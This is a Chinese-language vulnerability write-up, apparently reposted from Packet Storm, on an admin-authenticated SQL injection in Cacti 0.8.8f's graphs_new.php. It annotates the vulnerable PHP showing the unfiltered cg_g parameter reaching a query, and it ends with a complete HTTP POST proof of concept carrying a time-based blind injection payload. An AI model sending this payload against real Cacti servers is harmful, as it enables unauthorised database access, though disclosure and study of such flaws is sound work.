Cacti 0.8.8f SQL注入漏洞

渗透小能手

From:https://packetstormsecurity.com/files/135191/cacti088fgraphs-sql.txt


登录后，admin权限才能触发，比较鸡肋
漏洞分析

graphs_new.php

1. function form_save() {
   
2.     if (isset($_POST["save_component_graph"])) {
   
3.         /* summarize the 'create graph from host template/snmp index' stuff into an array */
   
4.         while (list($var, $val) = each($_POST)) {
   
5.             if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
   
6.                 $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
   
7. 
   
8.             //cg_g is not filtered
   
9. 
   
10.             }elseif (preg_match('/^cg_g$/', $var)) {
    
11.                 if ($_POST["cg_g"] > 0) {
    
12.                     $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;  //给数组赋值
    
13. 
    
14.                 }
    
15.             }elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {
    
16.                 $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
    
17.             }
    
18.         }
    
19. 
    
20.         if (isset($selected_graphs)) {
    
21.             host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);//调用漏洞函数
    
22.             exit;
    
23.         }
    
24. 
    
25.         header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    
26.     }
    
27. 
    
28.     if (isset($_POST["save_component_new_graphs"])) {
    
29.         host_new_graphs_save();
    
30. 
    
31.         header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    
32.     }
    
33. }
    
34. 
    
35. 
    
36. function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    
37.     /* we use object buffering on this page to allow redirection to another page if no
    
38.     fields are actually drawn */
    
39.     ob_start();
    
40. 
    
41.     include_once("./include/top_header.php");
    
42. 
    
43.     print "<form method='post' action='graphs_new.php'>\n";
    
44. 
    
45.     $snmp_query_id = 0;
    
46.     $num_output_fields = array();
    
47. 
    
48.     while (list($form_type, $form_array) = each($selected_graphs_array)) {//便利数组
    
49.         while (list($form_id1, $form_array2) = each($form_array)) {//继续便利数组，将数组中的key提取出来作为form_id1，form_id2
    
50.             if ($form_type == "cg") {
    
51.                 $graph_template_id = $form_id1; //赋值
    
52.                 //sql injection in graph_template_id
    
53.                 html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");//带入查询
    
54.             }elseif ($form_type == "sg") {
    
55.                 while (list($form_id2, $form_array3) = each($form_array2)) {
    
56.                     /* ================= input validation ================= */
    
57.                     input_validate_input_number($snmp_query_id);
    
58.                     /* ==================================================== */
    
59. 
    
60.                     $snmp_query_id = $form_id1;
    
61.                     $snmp_query_graph_id = $form_id2;

复制代码

POC

1. POST /cacti/graphs_new.php HTTP/1.1
   
2. Host: 192.168.217.133
   
3. Content-Type: application/x-www-form-urlencoded
   
4. Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
   
5. Content-Length: 189
   
6. 
   
7. __csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

复制代码